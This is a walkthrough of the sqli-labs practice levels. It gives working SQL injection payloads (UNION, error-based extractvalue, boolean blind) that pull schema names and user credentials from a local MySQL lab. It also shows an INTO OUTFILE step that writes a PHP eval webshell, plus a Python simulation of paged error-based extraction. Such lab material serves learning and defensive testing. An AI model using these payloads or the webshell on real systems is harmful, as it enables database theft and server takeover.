Less-1: single-quote injection
?id=1 returns normally
?id=1" returns normally
?id=1' returns an error
So the id parameter is most likely wrapped in single quotes and concatenated straight into the SQL string; closing the quote lets us append our own clauses.
Find the number of columns: ?id=1' order by 4 --+ errors, ?id=1' order by 3 --+ returns normally, so the query selects three columns (columns, not databases: ORDER BY n fails as soon as n exceeds the column count of the SELECT). The trailing + in --+ becomes a space once the URL is decoded; MySQL only treats -- as a comment when it is followed by whitespace.
Part 1: standard UNION-based extraction
Find the echo positions: ?id=1' union select 1,2,3 --+ shows which of the three columns are displayed on the page. In the following payloads id=-1 is used so that the original WHERE matches nothing and the UNION row is the one displayed.
Database and user: ?id=-1' union select 1,user(),database() --+ user: root@localhost, database: security
Table names: ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ tables: emails,referers,uagents,users
Column names: ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+ columns: USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password (USER, CURRENT_CONNECTIONS and TOTAL_CONNECTIONS belong to another schema's table that is also called users; the query filtered on table_name only, so add and table_schema='security' to get just id,username,password)
Data: ?id=-1' union select 1,group_concat(username),group_concat(password) from users --+
username: Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
password: Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Part 2: file read/write
Check whether files can be read: ?id=-1' union select 1,load_file('E:\\xxx\\WWW\\xxx\\readme.txt'),3 --+
Check whether a one-line PHP webshell can be written: ?id=-1' union select 1,"<?php @eval($_POST['x']);?>",3 into outfile 'E:\\xxx\\WWW\\shell.php' --+ succeeded; connecting with AntSword succeeded. Both load_file() and INTO OUTFILE require the MySQL account to hold the FILE privilege and the path to be permitted by secure_file_priv (NULL disables file access entirely; a directory outside the web root confines it), and INTO OUTFILE refuses to overwrite an existing file. The lab runs as root with no secure_file_priv restriction, which is why this works.
Part 3: blind and error-based injection
Error-based (Less-2; this level concatenates id unquoted, so the payloads need no closing quote):
?id=1 and (select extractvalue(1,concat('~',(select database())))) XPATH syntax error: '~security'
?id=1 and (select extractvalue(1,concat(0x7e,@@version))) XPATH syntax error: '~5.7.26'
?id=1 and (select extractvalue(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) XPATH syntax error: ',referers,uagents,users' (the first name, emails, is missing: without the ~ prefix the XPath parser accepts the leading name as a valid path and only reports from the first comma on, so always prefix the value with concat(0x7e,...))
?id=1 and (select extractvalue(1,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1))) XPATH syntax error: ',username,password' (the same problem swallows id here)
?id=1 and (select extractvalue(1,concat(0x7e,(select group_concat(username) from users limit 0,1)))) XPATH syntax error: '~Dumb,Angelina,Dummy,secure,stup'
?id=1 and (select extractvalue(1,concat(0x7e,(select group_concat(password) from users limit 0,1)))) XPATH syntax error: '~Dumb,I-kill-you,p@ssword,crappy'
The last two are cut off because MySQL reports at most 32 characters of the offending XPath string and the ~ takes one of them: wrap the inner select in substr() and advance the offset by 31 per request to read the rest. (The limit 0,1 on a group_concat is redundant, since the aggregate already returns one row.)
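The paging just described, as an added example that is not part of the original write-up. It runs offline against a stand-in: an in-memory SQLite table holding five rows copied from the dump above, and a fake_extractvalue_page() function that only models the one MySQL behaviour the technique depends on (the 32-character cap on the reported XPath string). The response format and the substr() window size are the assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the lab's users table (rows copied from the dump above).
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword"),
         (4, "secure", "crappy"), (5, "stupid", "stupidity")]

XPATH_ERR = re.compile(r"XPATH syntax error: '(.*)'")


def make_conn():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def fake_extractvalue_page(conn, expr):
    """Simulates the Less-2 response to
    ?id=1 and extractvalue(1,concat(0x7e,(expr))): MySQL echoes the invalid
    XPath string but only its first 32 characters. Only that cap is modelled;
    the inner expression is evaluated by SQLite here, not by MySQL."""
    value = conn.execute(f"SELECT ({expr})").fetchone()[0]
    return f"XPATH syntax error: '{('~' + str(value))[:32]}'"


def error_based_extract(fetch, expr, window=31):
    """Read expr in full by paging substr(expr, offset, 31): the ~ marker uses
    one of the 32 visible characters, so 31 data characters fit per request,
    and a chunk shorter than the window means the end has been reached."""
    out, offset = "", 1
    while True:
        m = XPATH_ERR.search(fetch(f"substr(({expr}),{offset},{window})"))
        if not m or not m.group(1).startswith("~"):
            raise ValueError("response did not contain the ~-prefixed error")
        chunk = m.group(1)[1:]          # drop the ~ marker
        out += chunk
        if len(chunk) < window:
            return out
        offset += window


def demo():
    conn = make_conn()
    fetch = lambda expr: fake_extractvalue_page(conn, expr)
    # One request, as in the write-up: the list is cut at 31 characters.
    single = fetch("select group_concat(username) from users")
    # Paged: the same list read completely.
    paged = error_based_extract(fetch, "select group_concat(username) from users")
    return single, paged


if __name__ == "__main__":
    print(demo())
```

The single request reproduces exactly the truncated '~Dumb,Angelina,Dummy,secure,stup' seen above; the paged version needs one more request and returns the full list. On the real target, fetch() would send the payload in the id parameter and return the response body.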
Time-based (Less-2):
Boolean-based blind (Less-8): the page renders its normal content when the injected condition is true and nothing when it is false or the query errors, so every request answers one yes/no question.
1. Length of the database name:
http://localhost/sqlilabs/Less-8/?id=1' and length(database())>10 --+ false
http://localhost/sqlilabs/Less-8/?id=1' and length(database())<10 --+ true
http://localhost/sqlilabs/Less-8/?id=1' and length(database())<9 --+ true
http://localhost/sqlilabs/Less-8/?id=1' and length(database())<8 --+ false, so the database name is 8 characters long
2. Database name:
http://localhost/sqlilabs/Less-8/?id=1' and left(database(),1)='s' --+ first character is 's'
http://localhost/sqlilabs/Less-8/?id=1' and left(database(),2)='se' --+ extending the prefix one character at a time yields 'security' (string = is case-insensitive under MySQL's default collation, so use ascii() as in step 5 when case matters)
3. Number of tables in the database:
?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4 --+ true
4. Table name lengths:
?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6 --+ true, so the first table name is 6 characters long
?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 1,1))=8 --+ true; likewise the four table names are 6, 8, 7 and 5 characters long
5. Table names:
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>65 --+ true
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<90 --+ false
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<110 --+ true; narrowing the range this way (a binary search) finally gives
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+ true: the first character of the first table name has ASCII code 101, i.e. 'e'
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109 --+ the second character of the first table name is 'm'; continuing gives 'emails'
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114 --+ the first character of the second table name is 'r'; the same procedure recovers all the table names
6. Number of columns in a table:
?id=1' and (select count(column_name) from information_schema.columns where table_name='emails')=2 --+ (as in Part 1, add and table_schema='security' if the count looks wrong: table_name alone matches same-named tables in every schema)
7. Column name lengths:
?id=1' and length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2 --+ the first column name is 2 characters long
?id=1' and length((select column_name from information_schema.columns where table_name='emails' limit 1,1))=8 --+ the second column name is 8 characters long
8. Column names:
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1))=101 --+ the first character of the second column name is 'e'; continuing gives 'email_id'
9. Data length:
?id=1' and length((select email_id from security.emails limit 0,1))=16 --+
10. Data:
?id=1' and ascii(substr((select email_id from security.emails limit 0,1),1,1))=68 --+ (68 is 'D'; repeat for each position up to the length found in step 9)